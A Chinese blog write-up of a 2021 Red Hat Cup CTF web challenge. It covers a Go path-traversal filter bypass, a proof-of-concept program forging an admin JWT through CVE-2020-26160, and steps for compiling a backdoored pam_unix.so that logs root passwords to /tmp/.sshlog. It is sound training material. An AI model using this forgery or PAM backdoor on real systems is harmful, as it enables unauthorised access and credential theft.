Skip to content

2021红帽线下Web wp

南京疫情没去成,问cop师傅要了Web题目复现下 [TOC]

alwaysBypass

Go的题,看源码,在images路由下有任意文件读取,用url编码和双写../绕过过滤

    r.GET("/images", func(c *gin.Context) {
        if strings.Contains(c.Request.RequestURI, "../") {
            c.String(http.StatusOK, "Illegal input")
        } else {
            images := c.DefaultQuery("file", "images.jpeg")
            images = strings.ReplaceAll(images, "../", "")
            fpath := filepath.Join("images", images)
            if stat, err := os.Stat(fpath);err ==nil && stat.Size()<13448304 {
                c.File(filepath.Join("images", images))
            }
        }

    })

image-20210805131249146

拿到SECRET_KEY (自己搭的环境 没改

想执行exec 要过user.TokenIsAdmin鉴权

func TokenIsAdmin(ss string) (bool, error) {

    token, err := jwt.ParseWithClaims(ss, &MyCustomClaims{}, func(token *jwt.Token) (interface{}, error) {
        return Secret, nil
    })
    if err != nil {
        return false, err
    }
    if claims, ok := token.Claims.(*MyCustomClaims); ok && token.Valid {
        if aud, ok := claims.MapClaims["aud"].(string); ok && aud == "" {
            return false, nil
        }
        if claims.ID != 10086 && claims.VerifyAudience(AdminKey, false) {
            return true, nil
        }
    }
    return false, nil
}

找到了这个https://snyk.io/blog/golang-security-access-restriction-bypass-vulnerability-jwt/

也就是CVE-2020-26160 4.0以下用[]string{""}绕过验证

poc

package main
import (
    "alwaysBypass/user"
    "github.com/dgrijalva/jwt-go"
)
import (
    "fmt"
)

type MyCustomClaims struct {
    ID int `json:"id"`
    jwt.MapClaims
}

func main() {
    claims := MyCustomClaims{
        123123,
        jwt.MapClaims{
            "aud":[]string{""},
        },
    }
    token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
    ss, _ := token.SignedString(user.Secret)
    fmt.Println(ss)
}

image-20210806221239321

替换掉Cookie

成功执行命令

因为每次执行命令都是去ssh输入用户密码去执行的

利用pam后门抓取root密码

image-20210806220129744

在http://www.linux-pam.org/library/ 下载对应pam源码

image-20210806220719859

添加后门

编译

./configure --prefix=/user --exec-prefix=/usr --localstatedir=/var --sysconfdir=/etc --disable-selinux --with-libiconv-prefix=/usr
make

编译好的在Linux-PAM-1.3.0/modules/pam_unix/.libs

中间遇到问题 修

  • apt install autoconf
  • autoreconf -vfi
  • apt install pkg-config libssl-dev 。。。。

image-20210806215800781

执行命令 find / -name "pam_unix.so"

image-20210806215524990

找到pam_unix.so文件的位置替换掉,直接执行命令 去/tmp/.sshlog查看就好了

image-20210806220051471


Last update: 2021-08-06